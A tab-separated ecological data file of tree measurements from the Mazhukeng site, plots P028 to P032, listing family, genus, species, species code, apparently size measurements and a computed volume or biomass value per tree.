Mazhukeng	1	P028	Rutaceae	Zanthoxylum	Zanthoxylum avicennae	ZANAVI	8	5.5	3.8	0.0159225
Mazhukeng	1	P028	Rutaceae	Zanthoxylum	Zanthoxylum avicennae	ZANAVI	4	6	5	0.00472771
Mazhukeng	1	P028	Rutaceae	Zanthoxylum	Zanthoxylum avicennae	ZANAVI	6	6.5	2.2	0.0109433
Mazhukeng	1	P028	Myrsinaceae	Ardisia	Ardisia quinquegona Bl.	ARDQUI	2	4	2.5	0.000864223
Mazhukeng	1	P028	Aquifoliaceae	Ilex	Ilex pubescens Hook. et Arn.	ILEPUB	1.2	3	2.4	0.00024974
Mazhukeng	1	P028	Aquifoliaceae	Ilex	Ilex pubescens Hook. et Arn.	ILEPUB	1.5	3.5	3	0.000441757
Mazhukeng	1	P028	Aquifoliaceae	Ilex	Ilex pubescens Hook. et Arn.	ILEPUB	2	4	3.6	0.000864223
Mazhukeng	1	P028	Theaceae	Schima	Schima superba Gardn. et Champ.	SCHSUP	6	10	7	0.0167271
Mazhukeng	1	P028	Theaceae	Schima	Schima superba Gardn. et Champ.	SCHSUP	14	10	6	0.0819525
Mazhukeng	1	P028	Thymelaeaceae	Aquilaria	Aquilaria sinensis (Lour.) Gilg.	AQUSIN	2	1.6	0.3	0.000350486
Mazhukeng	1	P028	Thymelaeaceae	Aquilaria	Aquilaria sinensis (Lour.) Gilg.	AQUSIN	16	7.5	4	0.0792988
Mazhukeng	1	P028	Thymelaeaceae	Aquilaria	Aquilaria sinensis (Lour.) Gilg.	AQUSIN	6	8	6.5	0.0134267
Mazhukeng	1	P028	Araliaceae	Schefflera	Schefflera octophylla (Lour.) Harms	SCHOCT	4	2.5	2.5	0.00199599
Mazhukeng	1	P028	Araliaceae	Schefflera	Schefflera octophylla (Lour.) Harms	SCHOCT	4	6.5	5	0.00511552
Mazhukeng	1	P028	Araliaceae	Schefflera	Schefflera octophylla (Lour.) Harms	SCHOCT	6	7	1.8	0.011772
Mazhukeng	1	P028	Araliaceae	Schefflera	Schefflera octophylla (Lour.) Harms	SCHOCT	8	7.5	2	0.0216115
Mazhukeng	1	P028	Araliaceae	Schefflera	Schefflera octophylla (Lour.) Harms	SCHOCT	9	8	2	0.0287229
Mazhukeng	1	P028	Anacardiaceae	Toxicodendron	Toxicodendron succedaneum (L.) O.Kuntze	TOXSUC	4	4.5	2	0.00356116
Mazhukeng	1	P028	Anacardiaceae	Toxicodendron	Toxicodendron succedaneum (L.) O.Kuntze	TOXSUC	3.5	5	1.8	0.00307536
Mazhukeng	1	P028	Euphorbiaceae	Aporosa	Aporosa dioica (Roxb.) Muell.-Arg. [A. chinensis (Champ.) Merr.]	APODIO	2	3	1.6	0.000650978
Mazhukeng	1	P028	Theaceae	Camellia	Camellia oleifera Abel.	CAMOLE	1	3	1.6	0.000177413
Mazhukeng	1	P028	Theaceae	Camellia	Camellia oleifera Abel.	CAMOLE	4	4	1.6	0.00317108
Mazhukeng	1	P028	Theaceae	Camellia	Camellia oleifera Abel.	CAMOLE	2	4.5	1.6	0.00097053
Mazhukeng	1	P028	Theaceae	Camellia	Camellia oleifera Abel.	CAMOLE	3	5.5	3	0.00252993
Mazhukeng	1	P029	Alangiaceae	Alangium	Alangium chinense (Lour.) Harms	ALACHI	4	6	3.5	0.00472771
Mazhukeng	1	P029	Alangiaceae	Alangium	Alangium chinense (Lour.) Harms	ALACHI	15	8.6	2	0.0803974
Mazhukeng	1	P029	Lauraceae	Litsea	Litsea rotundifolia var. oblongifolia (Nees) Allen	LITROT	1.5	3	1.7	0.000379528
Mazhukeng	1	P029	Lauraceae	Litsea	Litsea rotundifolia var. oblongifolia (Nees) Allen	LITROT	3	3	1.7	0.0013926
Mazhukeng	1	P029	Lauraceae	Litsea	Litsea rotundifolia var. oblongifolia (Nees) Allen	LITROT	4	3.5	1.6	0.00278028
Mazhukeng	1	P029	Lauraceae	Litsea	Litsea rotundifolia var. oblongifolia (Nees) Allen	LITROT	3	4	1.6	0.00184878
Mazhukeng	1	P029	Lauraceae	Litsea	Litsea rotundifolia var. oblongifolia (Nees) Allen	LITROT	3	4.5	1.5	0.0020762
Mazhukeng	1	P029	Lauraceae	Litsea	Litsea rotundifolia var. oblongifolia (Nees) Allen	LITROT	4	5	2	0.00395057
Mazhukeng	1	P029	Lauraceae	Litsea	Litsea rotundifolia var. oblongifolia (Nees) Allen	LITROT	4	5	1.6	0.00395057
Mazhukeng	1	P029	Lauraceae	Litsea	Litsea rotundifolia var. oblongifolia (Nees) Allen	LITROT	4	5	1.6	0.00395057
Mazhukeng	1	P029	Hamamelidaceae	Liquidambar	Liquidambar formosana Hance	LIQFOR	6	7	1.7	0.011772
Mazhukeng	1	P029	Theaceae	Eurya	Eurya ciliata Merr.	EURCIL	4	6	3.5	0.00472771
Mazhukeng	1	P029	Theaceae	Eurya	Eurya ciliata Merr.	EURCIL	24	12.5	4	0.280568
Mazhukeng	1	P029	Lauraceae	Litsea	Litsea yunnanensis	LITYUN	6	6.5	4.2	0.0109433
Mazhukeng	1	P029	Lauraceae	Litsea	Litsea yunnanensis	LITYUN	10	6.5	4	0.028525
Mazhukeng	1	P029	Rutaceae	Acronychia	Acronychia pedunculata (L.) Miq.	ACRPED	6	4	2	0.0067837
Mazhukeng	1	P029	Rutaceae	Acronychia	Acronychia pedunculata (L.) Miq.	ACRPED	5	5	2	0.00600364
Mazhukeng	1	P029	Rutaceae	Acronychia	Acronychia pedunculata (L.) Miq.	ACRPED	10	7	3.5	0.0306851
Mazhukeng	1	P029	Rutaceae	Acronychia	Acronychia pedunculata (L.) Miq.	ACRPED	9	8	2.8	0.0287229
Mazhukeng	1	P029	Rutaceae	Acronychia	Acronychia pedunculata (L.) Miq.	ACRPED	2	13.5	2	0.00286388
Mazhukeng	1	P029	Rubiaceae	Psychotria	Psychotria rubra (Lour.) Poir.	PSYRUB	2	3	1.2	0.000650978
Mazhukeng	1	P029	Rubiaceae	Psychotria	Psychotria rubra (Lour.) Poir.	PSYRUB	2	3	1.6	0.000650978
Mazhukeng	1	P029	Rubiaceae	Psychotria	Psychotria rubra (Lour.) Poir.	PSYRUB	2	3	1.5	0.000650978
Mazhukeng	1	P029	Rubiaceae	Psychotria	Psychotria rubra (Lour.) Poir.	PSYRUB	2	3	1.5	0.000650978
Mazhukeng	1	P029	Rubiaceae	Psychotria	Psychotria rubra (Lour.) Poir.	PSYRUB	3	3	1.5	0.0013926
Mazhukeng	1	P029	Rubiaceae	Psychotria	Psychotria rubra (Lour.) Poir.	PSYRUB	4	3	1.5	0.00238863
Mazhukeng	1	P029	Rubiaceae	Psychotria	Psychotria rubra (Lour.) Poir.	PSYRUB	5	4.5	1.4	0.00541185
Mazhukeng	1	P029	Rubiaceae	Psychotria	Psychotria rubra (Lour.) Poir.	PSYRUB	3	5	2	0.00230323
Mazhukeng	1	P029	Aquifoliaceae	Ilex	Ilex pubescens Hook. et Arn.	ILEPUB	2	4.5	3	0.00097053
Mazhukeng	1	P029	Aquifoliaceae	Ilex	Ilex pubescens Hook. et Arn.	ILEPUB	1.2	5	4	0.000413049
Mazhukeng	1	P029	Theaceae	Schima	Schima superba Gardn. et Champ.	SCHSUP	4	7	1.8	0.00550289
Mazhukeng	1	P029	Theaceae	Schima	Schima superba Gardn. et Champ.	SCHSUP	14	9	5	0.0738742
Mazhukeng	1	P029	Theaceae	Schima	Schima superba Gardn. et Champ.	SCHSUP	16	10.5	6.6	0.110458
Mazhukeng	1	P029	Theaceae	Schima	Schima superba Gardn. et Champ.	SCHSUP	22	12	4	0.22893
Mazhukeng	1	P029	Daphniphyllaceae	Daphniphyllum	Daphniphyllum calycinum Benth.	DAPCAL	5	4.5	2.5	0.00541185
Mazhukeng	1	P029	Daphniphyllaceae	Daphniphyllum	Daphniphyllum calycinum Benth.	DAPCAL	6	5	2.5	0.00845122
Mazhukeng	1	P029	Escalloniaceae	Itea	Itea chinensis Hook. et Arn.	ITECHI	3	4.5	2	0.0020762
Mazhukeng	1	P029	Rubiaceae	Adina	Adina pilulifera (Lam.) Fr.	ADIPIL	2	4	2	0.000864223
Mazhukeng	1	P029	Rubiaceae	Adina	Adina pilulifera (Lam.) Fr.	ADIPIL	4	5	1.6	0.00395057
Mazhukeng	1	P029	Araliaceae	Schefflera	Schefflera octophylla (Lour.) Harms	SCHOCT	3	4	3.5	0.00184878
Mazhukeng	1	P029	Araliaceae	Schefflera	Schefflera octophylla (Lour.) Harms	SCHOCT	3	5	2	0.00230323
Mazhukeng	1	P029	Araliaceae	Schefflera	Schefflera octophylla (Lour.) Harms	SCHOCT	4	5.5	3.5	0.00433941
Mazhukeng	1	P029	Araliaceae	Schefflera	Schefflera octophylla (Lour.) Harms	SCHOCT	5	5.5	4	0.00659455
Mazhukeng	1	P029	Araliaceae	Schefflera	Schefflera octophylla (Lour.) Harms	SCHOCT	6	6	3.5	0.0101137
Mazhukeng	1	P029	Araliaceae	Schefflera	Schefflera octophylla (Lour.) Harms	SCHOCT	7	6.5	3.5	0.0146119
Mazhukeng	1	P029	Araliaceae	Schefflera	Schefflera octophylla (Lour.) Harms	SCHOCT	6	7	2	0.011772
Mazhukeng	1	P029	Araliaceae	Schefflera	Schefflera octophylla (Lour.) Harms	SCHOCT	10	7	3.5	0.0306851
Mazhukeng	1	P029	Araliaceae	Schefflera	Schefflera octophylla (Lour.) Harms	SCHOCT	10	7	6	0.0306851
Mazhukeng	1	P029	Araliaceae	Schefflera	Schefflera octophylla (Lour.) Harms	SCHOCT	12	7.5	3.5	0.0462321
Mazhukeng	1	P029	Araliaceae	Schefflera	Schefflera octophylla (Lour.) Harms	SCHOCT	12	8	2	0.0492664
Mazhukeng	1	P029	Araliaceae	Schefflera	Schefflera octophylla (Lour.) Harms	SCHOCT	15	8	1.7	0.0748697
Mazhukeng	1	P029	Araliaceae	Schefflera	Schefflera octophylla (Lour.) Harms	SCHOCT	16	8	3.5	0.0845033
Mazhukeng	1	P029	Araliaceae	Schefflera	Schefflera octophylla (Lour.) Harms	SCHOCT	16	8	3.5	0.0845033
Mazhukeng	1	P029	Euphorbiaceae	Aporosa	Aporosa dioica (Roxb.) Muell.-Arg. [A. chinensis (Champ.) Merr.]	APODIO	3	4	2	0.00184878
Mazhukeng	1	P029	Euphorbiaceae	Aporosa	Aporosa dioica (Roxb.) Muell.-Arg. [A. chinensis (Champ.) Merr.]	APODIO	5	6	1.5	0.00718464
Mazhukeng	1	P029	Euphorbiaceae	Aporosa	Aporosa dioica (Roxb.) Muell.-Arg. [A. chinensis (Champ.) Merr.]	APODIO	6	7.5	3	0.0125998
Mazhukeng	1	P029	Theaceae	Camellia	Camellia oleifera Abel.	CAMOLE	1.5	3	2	0.000379528
Mazhukeng	1	P029	Theaceae	Camellia	Camellia oleifera Abel.	CAMOLE	2	3	1.6	0.000650978
Mazhukeng	1	P029	Theaceae	Camellia	Camellia oleifera Abel.	CAMOLE	2	3	2	0.000650978
Mazhukeng	1	P029	Theaceae	Camellia	Camellia oleifera Abel.	CAMOLE	2	4	1.5	0.000864223
Mazhukeng	1	P029	Theaceae	Camellia	Camellia oleifera Abel.	CAMOLE	2	4	2	0.000864223
Mazhukeng	1	P030	Moraceae	Ficus	Ficus variolosa Lindl. ex Benth.	FICVAR	6	6	2	0.0101137
Mazhukeng	1	P030	Lauraceae	Litsea	Litsea rotundifolia var. oblongifolia (Nees) Allen	LITROT	1.5	1.8	1.8	0.000229473
Mazhukeng	1	P030	Lauraceae	Litsea	Litsea rotundifolia var. oblongifolia (Nees) Allen	LITROT	2	2	1.5	0.00043664
Mazhukeng	1	P030	Lauraceae	Litsea	Litsea rotundifolia var. oblongifolia (Nees) Allen	LITROT	1.5	2.5	2	0.000317142
Mazhukeng	1	P030	Lauraceae	Litsea	Litsea rotundifolia var. oblongifolia (Nees) Allen	LITROT	1.5	2.5	1.6	0.000317142
Mazhukeng	1	P030	Lauraceae	Litsea	Litsea rotundifolia var. oblongifolia (Nees) Allen	LITROT	2	2.5	1.5	0.000543971
Mazhukeng	1	P030	Lauraceae	Litsea	Litsea rotundifolia var. oblongifolia (Nees) Allen	LITROT	2	3	1.5	0.000650978
Mazhukeng	1	P030	Lauraceae	Litsea	Litsea rotundifolia var. oblongifolia (Nees) Allen	LITROT	3	3	1.5	0.0013926
Mazhukeng	1	P030	Lauraceae	Litsea	Litsea rotundifolia var. oblongifolia (Nees) Allen	LITROT	3	3	2.2	0.0013926
Mazhukeng	1	P030	Lauraceae	Litsea	Litsea rotundifolia var. oblongifolia (Nees) Allen	LITROT	4	3	2	0.00238863
Mazhukeng	1	P030	Lauraceae	Litsea	Litsea rotundifolia var. oblongifolia (Nees) Allen	LITROT	2	3.5	1.4	0.000757716
Mazhukeng	1	P030	Lauraceae	Litsea	Litsea rotundifolia var. oblongifolia (Nees) Allen	LITROT	2	4	2	0.000864223
Mazhukeng	1	P030	Lauraceae	Litsea	Litsea rotundifolia var. oblongifolia (Nees) Allen	LITROT	2	4	1.6	0.000864223
Mazhukeng	1	P030	Lauraceae	Litsea	Litsea rotundifolia var. oblongifolia (Nees) Allen	LITROT	4	4	1.6	0.00317108
Mazhukeng	1	P030	Lauraceae	Litsea	Litsea rotundifolia var. oblongifolia (Nees) Allen	LITROT	2	4.5	1.4	0.00097053
Mazhukeng	1	P030	Lauraceae	Litsea	Litsea rotundifolia var. oblongifolia (Nees) Allen	LITROT	2	5	3	0.00107666
Mazhukeng	1	P030	Lauraceae	Litsea	Litsea rotundifolia var. oblongifolia (Nees) Allen	LITROT	3	5	1.6	0.00230323
Mazhukeng	1	P030	Lauraceae	Litsea	Litsea rotundifolia var. oblongifolia (Nees) Allen	LITROT	3	5	1.6	0.00230323
Mazhukeng	1	P030	Lauraceae	Litsea	Litsea rotundifolia var. oblongifolia (Nees) Allen	LITROT	3	5	1.7	0.00230323
Mazhukeng	1	P030	Lauraceae	Litsea	Litsea rotundifolia var. oblongifolia (Nees) Allen	LITROT	4	5	1.5	0.00395057
Mazhukeng	1	P030	Lauraceae	Litsea	Litsea rotundifolia var. oblongifolia (Nees) Allen	LITROT	3	5.5	2	0.00252993
Mazhukeng	1	P030	Lauraceae	Litsea	Litsea rotundifolia var. oblongifolia (Nees) Allen	LITROT	4	5.5	3	0.00433941
Mazhukeng	1	P030	Lauraceae	Litsea	Litsea rotundifolia var. oblongifolia (Nees) Allen	LITROT	5	5.5	2	0.00659455
Mazhukeng	1	P030	Lauraceae	Litsea	Litsea rotundifolia var. oblongifolia (Nees) Allen	LITROT	5	6.5	3.5	0.007774
Mazhukeng	1	P030	Myrtaceae	Syzygium	Syzygium buxifolium Hook. et Arn.	SYZBUX	1.5	3	1.5	0.000379528
Mazhukeng	1	P030	Myrtaceae	Syzygium	Syzygium buxifolium Hook. et Arn.	SYZBUX	2	3	1.6	0.000650978
Mazhukeng	1	P030	Myrtaceae	Syzygium	Syzygium buxifolium Hook. et Arn.	SYZBUX	2	3	1.5	0.000650978
Mazhukeng	1	P030	Hamamelidaceae	Liquidambar	Liquidambar formosana Hance	LIQFOR	5	6.5	2.5	0.007774
Mazhukeng	1	P030	Flacourtiaceae	Scolopia	Scolopia saeva	SCOSAE	11	8.5	4	0.0444234
Mazhukeng	1	P030	Rubiaceae	Psychotria	Psychotria rubra (Lour.) Poir.	PSYRUB	2	2.5	1.5	0.000543971
Mazhukeng	1	P030	Rubiaceae	Psychotria	Psychotria rubra (Lour.) Poir.	PSYRUB	2	3	1.5	0.000650978
Mazhukeng	1	P030	Rubiaceae	Psychotria	Psychotria rubra (Lour.) Poir.	PSYRUB	2	3	1.5	0.000650978
Mazhukeng	1	P030	Rubiaceae	Psychotria	Psychotria rubra (Lour.) Poir.	PSYRUB	3	3	1.5	0.0013926
Mazhukeng	1	P030	Rubiaceae	Psychotria	Psychotria rubra (Lour.) Poir.	PSYRUB	3	3	2	0.0013926
Mazhukeng	1	P030	Rubiaceae	Psychotria	Psychotria rubra (Lour.) Poir.	PSYRUB	3	3.5	1.5	0.00162093
Mazhukeng	1	P030	Rutaceae	Zanthoxylum	Zanthoxylum avicennae	ZANAVI	4	4	2	0.00317108
Mazhukeng	1	P030	Pinaceae	Pinus	Pinus massoniana Lamb.	PINMAS	8	8	2	0.0230299
Mazhukeng	1	P030	Pinaceae	Pinus	Pinus massoniana Lamb.	PINMAS	21	8	4	0.140724
Mazhukeng	1	P030	Aquifoliaceae	Ilex	Ilex pubescens Hook. et Arn.	ILEPUB	3	3.5	2	0.00162093
Mazhukeng	1	P030	Escalloniaceae	Itea	Itea chinensis Hook. et Arn.	ITECHI	4	5.5	2	0.00433941
Mazhukeng	1	P030	Rubiaceae	Adina	Adina pilulifera (Lam.) Fr.	ADIPIL	3.5	2.5	2	0.0015538
Mazhukeng	1	P030	Rubiaceae	Adina	Adina pilulifera (Lam.) Fr.	ADIPIL	2	3	2.2	0.000650978
Mazhukeng	1	P030	Rubiaceae	Adina	Adina pilulifera (Lam.) Fr.	ADIPIL	2	3	1.7	0.000650978
Mazhukeng	1	P030	Euphorbiaceae	Aporosa	Aporosa dioica (Roxb.) Muell.-Arg. [A. chinensis (Champ.) Merr.]	APODIO	2	3	2	0.000650978
Mazhukeng	1	P030	Euphorbiaceae	Aporosa	Aporosa dioica (Roxb.) Muell.-Arg. [A. chinensis (Champ.) Merr.]	APODIO	1.5	3.5	3	0.000441757
Mazhukeng	1	P030	Euphorbiaceae	Aporosa	Aporosa dioica (Roxb.) Muell.-Arg. [A. chinensis (Champ.) Merr.]	APODIO	3	3.5	1.5	0.00162093
Mazhukeng	1	P030	Euphorbiaceae	Aporosa	Aporosa dioica (Roxb.) Muell.-Arg. [A. chinensis (Champ.) Merr.]	APODIO	5	4	1.6	0.00481906
Mazhukeng	1	P030	Euphorbiaceae	Aporosa	Aporosa dioica (Roxb.) Muell.-Arg. [A. chinensis (Champ.) Merr.]	APODIO	4	5.5	1.8	0.00433941
Mazhukeng	1	P030	Euphorbiaceae	Aporosa	Aporosa dioica (Roxb.) Muell.-Arg. [A. chinensis (Champ.) Merr.]	APODIO	4	5.5	1.8	0.00433941
Mazhukeng	1	P030	Euphorbiaceae	Aporosa	Aporosa dioica (Roxb.) Muell.-Arg. [A. chinensis (Champ.) Merr.]	APODIO	5	5.5	2.5	0.00659455
Mazhukeng	1	P030	Euphorbiaceae	Aporosa	Aporosa dioica (Roxb.) Muell.-Arg. [A. chinensis (Champ.) Merr.]	APODIO	5	5.5	1.8	0.00659455
Mazhukeng	1	P030	Euphorbiaceae	Aporosa	Aporosa dioica (Roxb.) Muell.-Arg. [A. chinensis (Champ.) Merr.]	APODIO	4	6	2	0.00472771
Mazhukeng	1	P030	Euphorbiaceae	Aporosa	Aporosa dioica (Roxb.) Muell.-Arg. [A. chinensis (Champ.) Merr.]	APODIO	4	8	6	0.00627639
Mazhukeng	1	P031	Lauraceae	Litsea	Litsea rotundifolia var. oblongifolia (Nees) Allen	LITROT	1.2	1.8	0.6	0.000151
Mazhukeng	1	P031	Lauraceae	Machilus	Machilus chinensis (Champ. ex Benth.) Hemsl.	MACCHI	15.5	10.5	6	0.104073
Mazhukeng	1	P031	Rutaceae	Acronychia	Acronychia pedunculata (L.) Miq.	ACRPED	1.1	2	1.4	0.00014229
Mazhukeng	1	P031	Rutaceae	Acronychia	Acronychia pedunculata (L.) Miq.	ACRPED	1.4	2.3	1.2	0.000256679
Mazhukeng	1	P031	Rutaceae	Acronychia	Acronychia pedunculata (L.) Miq.	ACRPED	3.2	4.5	1.4	0.00234334
Mazhukeng	1	P031	Rutaceae	Acronychia	Acronychia pedunculata (L.) Miq.	ACRPED	10	6	2.2	0.0263625
Mazhukeng	1	P031	Rutaceae	Acronychia	Acronychia pedunculata (L.) Miq.	ACRPED	17	7	4	0.0830107
Mazhukeng	1	P031	Rutaceae	Acronychia	Acronychia pedunculata (L.) Miq.	ACRPED	6.3	8	6	0.0147133
Mazhukeng	1	P031	Rubiaceae	Psychotria	Psychotria rubra (Lour.) Poir.	PSYRUB	1.2	2	1.2	0.000167512
Mazhukeng	1	P031	Rubiaceae	Psychotria	Psychotria rubra (Lour.) Poir.	PSYRUB	2	2.5	1.1	0.000543971
Mazhukeng	1	P031	Rubiaceae	Psychotria	Psychotria rubra (Lour.) Poir.	PSYRUB	2.1	2.5	1.1	0.000596096
Mazhukeng	1	P031	Rutaceae	Zanthoxylum	Zanthoxylum avicennae	ZANAVI	3	5.5	4	0.00252993
Mazhukeng	1	P031	Rutaceae	Zanthoxylum	Zanthoxylum avicennae	ZANAVI	4.3	5.5	4	0.00496978
Mazhukeng	1	P031	Rutaceae	Zanthoxylum	Zanthoxylum avicennae	ZANAVI	6	6.5	4	0.0109433
Mazhukeng	1	P031	Rutaceae	Zanthoxylum	Zanthoxylum avicennae	ZANAVI	7	7	1.4	0.0157184
Mazhukeng	1	P031	Aquifoliaceae	Ilex	Ilex pubescens Hook. et Arn.	ILEPUB	5	3.5	0.8	0.00422516
Mazhukeng	1	P031	Theaceae	Schima	Schima superba Gardn. et Champ.	SCHSUP	6	7.5	2	0.0125998
Mazhukeng	1	P031	Theaceae	Schima	Schima superba Gardn. et Champ.	SCHSUP	15	7.5	4.5	0.0702585
Mazhukeng	1	P031	Theaceae	Schima	Schima superba Gardn. et Champ.	SCHSUP	12	11.5	7	0.070435
Mazhukeng	1	P031	Anacardiaceae	Choerospondias	Choerospondias axillaris (Roxb.) Burtt et Hill	CHOAXI	25	12	3.5	0.290955
Mazhukeng	1	P031	Daphniphyllaceae	Daphniphyllum	Daphniphyllum calycinum Benth.	DAPCAL	2.5	4.5	3	0.0014749
Mazhukeng	1	P031	Escalloniaceae	Itea	Itea chinensis Hook. et Arn.	ITECHI	3	5	2.5	0.00230323
Mazhukeng	1	P031	Escalloniaceae	Itea	Itea chinensis Hook. et Arn.	ITECHI	4	6.5	5	0.00511552
Mazhukeng	1	P031	Aquifoliaceae	Ilex	Ilex rotunda Thuunb.	ILEROT	8.5	7.5	5	0.0242139
Mazhukeng	1	P031	Thymelaeaceae	Aquilaria	Aquilaria sinensis (Lour.) Gilg.	AQUSIN	1.2	1.5	0.8	0.000126179
Mazhukeng	1	P031	Araliaceae	Schefflera	Schefflera octophylla (Lour.) Harms	SCHOCT	9	5.5	2.5	0.0198586
Mazhukeng	1	P031	Araliaceae	Schefflera	Schefflera octophylla (Lour.) Harms	SCHOCT	12	6	3	0.03711
Mazhukeng	1	P031	Araliaceae	Schefflera	Schefflera octophylla (Lour.) Harms	SCHOCT	16	6	3.5	0.0636523
Mazhukeng	1	P031	Araliaceae	Schefflera	Schefflera octophylla (Lour.) Harms	SCHOCT	16	6.5	2.5	0.0688737
Mazhukeng	1	P031	Anacardiaceae	Toxicodendron	Toxicodendron succedaneum (L.) O.Kuntze	TOXSUC	4.5	4	2.5	0.00395498
Mazhukeng	1	P031	Anacardiaceae	Toxicodendron	Toxicodendron succedaneum (L.) O.Kuntze	TOXSUC	8	5.5	4	0.0159225
Mazhukeng	1	P031	Euphorbiaceae	Aporosa	Aporosa dioica (Roxb.) Muell.-Arg. [A. chinensis (Champ.) Merr.]	APODIO	3.5	4	2.7	0.00246856
Mazhukeng	1	P031	Euphorbiaceae	Aporosa	Aporosa dioica (Roxb.) Muell.-Arg. [A. chinensis (Champ.) Merr.]	APODIO	4	6	4.5	0.00472771
Mazhukeng	1	P032	Lauraceae	Litsea	Litsea rotundifolia var. oblongifolia (Nees) Allen	LITROT	2	0.8	0.3	0.00017708
Mazhukeng	1	P032	Lauraceae	Litsea	Litsea rotundifolia var. oblongifolia (Nees) Allen	LITROT	2	2	0.6	0.00043664
Mazhukeng	1	P032	Lauraceae	Litsea	Litsea rotundifolia var. oblongifolia (Nees) Allen	LITROT	1.2	2.6	1.2	0.000216908
Mazhukeng	1	P032	Lauraceae	Litsea	Litsea rotundifolia var. oblongifolia (Nees) Allen	LITROT	2	2.6	1.3	0.000565396
Mazhukeng	1	P032	Lauraceae	Litsea	Litsea rotundifolia var. oblongifolia (Nees) Allen	LITROT	2.5	2.6	0.6	0.000859227
Mazhukeng	1	P032	Lauraceae	Litsea	Litsea rotundifolia var. oblongifolia (Nees) Allen	LITROT	1.2	2.7	1.2	0.000225123
Mazhukeng	1	P032	Lauraceae	Litsea	Litsea rotundifolia var. oblongifolia (Nees) Allen	LITROT	3	2.7	0.8	0.00125532
Mazhukeng	1	P032	Lauraceae	Litsea	Litsea rotundifolia var. oblongifolia (Nees) Allen	LITROT	1.3	2.8	0.8	0.000271127
Mazhukeng	1	P032	Lauraceae	Litsea	Litsea rotundifolia var. oblongifolia (Nees) Allen	LITROT	1.1	3	1.2	0.000212137
Mazhukeng	1	P032	Lauraceae	Litsea	Litsea rotundifolia var. oblongifolia (Nees) Allen	LITROT	1.5	3	2.5	0.000379528
Mazhukeng	1	P032	Lauraceae	Litsea	Litsea rotundifolia var. oblongifolia (Nees) Allen	LITROT	3.5	3	0.6	0.00185945
Mazhukeng	1	P032	Lauraceae	Litsea	Litsea rotundifolia var. oblongifolia (Nees) Allen	LITROT	4	3	1.8	0.00238863
Mazhukeng	1	P032	Lauraceae	Litsea	Litsea rotundifolia var. oblongifolia (Nees) Allen	LITROT	5	3	1	0.00362997
Mazhukeng	1	P032	Lauraceae	Litsea	Litsea rotundifolia var. oblongifolia (Nees) Allen	LITROT	1.8	3.5	1.5	0.000621853
Mazhukeng	1	P032	Lauraceae	Litsea	Litsea rotundifolia var. oblongifolia (Nees) Allen	LITROT	2	3.5	1.2	0.000757716
Mazhukeng	1	P032	Lauraceae	Litsea	Litsea rotundifolia var. oblongifolia (Nees) Allen	LITROT	1	4	1.2	0.000235529
Mazhukeng	1	P032	Lauraceae	Litsea	Litsea rotundifolia var. oblongifolia (Nees) Allen	LITROT	3	4	0.7	0.00184878
Mazhukeng	1	P032	Lauraceae	Litsea	Litsea rotundifolia var. oblongifolia (Nees) Allen	LITROT	3	5.5	0.5	0.00252993
Mazhukeng	1	P032	Lauraceae	Litsea	Litsea rotundifolia var. oblongifolia (Nees) Allen	LITROT	15	11	6	0.102454
Mazhukeng	1	P032	Rutaceae	Acronychia	Acronychia pedunculata (L.) Miq.	ACRPED	8	5.5	2	0.0159225
Mazhukeng	1	P032	Rubiaceae	Psychotria	Psychotria rubra (Lour.) Poir.	PSYRUB	1.2	1.5	0.5	0.000126179
Mazhukeng	1	P032	Rubiaceae	Psychotria	Psychotria rubra (Lour.) Poir.	PSYRUB	2	1.8	0.8	0.000393599
Mazhukeng	1	P032	Rubiaceae	Psychotria	Psychotria rubra (Lour.) Poir.	PSYRUB	2.2	1.9	1.5	0.00049638
Mazhukeng	1	P032	Rutaceae	Zanthoxylum	Zanthoxylum avicennae	ZANAVI	4	4.5	1.6	0.00356116
Mazhukeng	1	P032	Rutaceae	Zanthoxylum	Zanthoxylum avicennae	ZANAVI	8.5	6	2	0.0194362
Mazhukeng	1	P032	Aquifoliaceae	Ilex	Ilex pubescens Hook. et Arn.	ILEPUB	3	1.7	0.3	0.000795908
Mazhukeng	1	P032	Aquifoliaceae	Ilex	Ilex pubescens Hook. et Arn.	ILEPUB	1.5	2.8	1.8	0.000354594
Mazhukeng	1	P032	Theaceae	Schima	Schima superba Gardn. et Champ.	SCHSUP	1.2	1.6	0.5	0.00013446
Mazhukeng	1	P032	Theaceae	Schima	Schima superba Gardn. et Champ.	SCHSUP	2	1.6	0.5	0.000350486
Mazhukeng	1	P032	Theaceae	Schima	Schima superba Gardn. et Champ.	SCHSUP	2	2	1.5	0.00043664
Mazhukeng	1	P032	Theaceae	Schima	Schima superba Gardn. et Champ.	SCHSUP	1.8	3	1.4	0.000534254
Mazhukeng	1	P032	Theaceae	Schima	Schima superba Gardn. et Champ.	SCHSUP	3	4.3	2.5	0.00198528
Mazhukeng	1	P032	Theaceae	Schima	Schima superba Gardn. et Champ.	SCHSUP	1.8	4.5	2.2	0.00079651
Mazhukeng	1	P032	Theaceae	Schima	Schima superba Gardn. et Champ.	SCHSUP	5	7	4	0.00836267
Mazhukeng	1	P032	Theaceae	Schima	Schima superba Gardn. et Champ.	SCHSUP	15	9	4	0.0840793
Mazhukeng	1	P032	Theaceae	Schima	Schima superba Gardn. et Champ.	SCHSUP	18	10	6	0.131299
Mazhukeng	1	P032	Theaceae	Schima	Schima superba Gardn. et Champ.	SCHSUP	14	11	7.5	0.0900186
Mazhukeng	1	P032	Theaceae	Schima	Schima superba Gardn. et Champ.	SCHSUP	15	11	7	0.102454
Mazhukeng	1	P032	Theaceae	Schima	Schima superba Gardn. et Champ.	SCHSUP	15	11	7	0.102454
Mazhukeng	1	P032	Theaceae	Schima	Schima superba Gardn. et Champ.	SCHSUP	12	12	6.5	0.0734504
Mazhukeng	1	P032	Theaceae	Schima	Schima superba Gardn. et Champ.	SCHSUP	14	12	6	0.0980737
Mazhukeng	1	P032	Theaceae	Schima	Schima superba Gardn. et Champ.	SCHSUP	15	13	5	0.120778
Mazhukeng	1	P032	Escalloniaceae	Itea	Itea chinensis Hook. et Arn.	ITECHI	1	1.6	1.3	9.55189e-05
Mazhukeng	1	P032	Escalloniaceae	Itea	Itea chinensis Hook. et Arn.	ITECHI	1.2	2.5	1.9	0.000208689
Mazhukeng	1	P032	Escalloniaceae	Itea	Itea chinensis Hook. et Arn.	ITECHI	2	4	1.4	0.000864223
Mazhukeng	1	P032	Escalloniaceae	Itea	Itea chinensis Hook. et Arn.	ITECHI	2.6	4	1.9	0.0014136
Mazhukeng	1	P032	Escalloniaceae	Itea	Itea chinensis Hook. et Arn.	ITECHI	4	4.5	2.8	0.00356116
Mazhukeng	1	P032	Escalloniaceae	Itea	Itea chinensis Hook. et Arn.	ITECHI	5	4.5	2	0.00541185
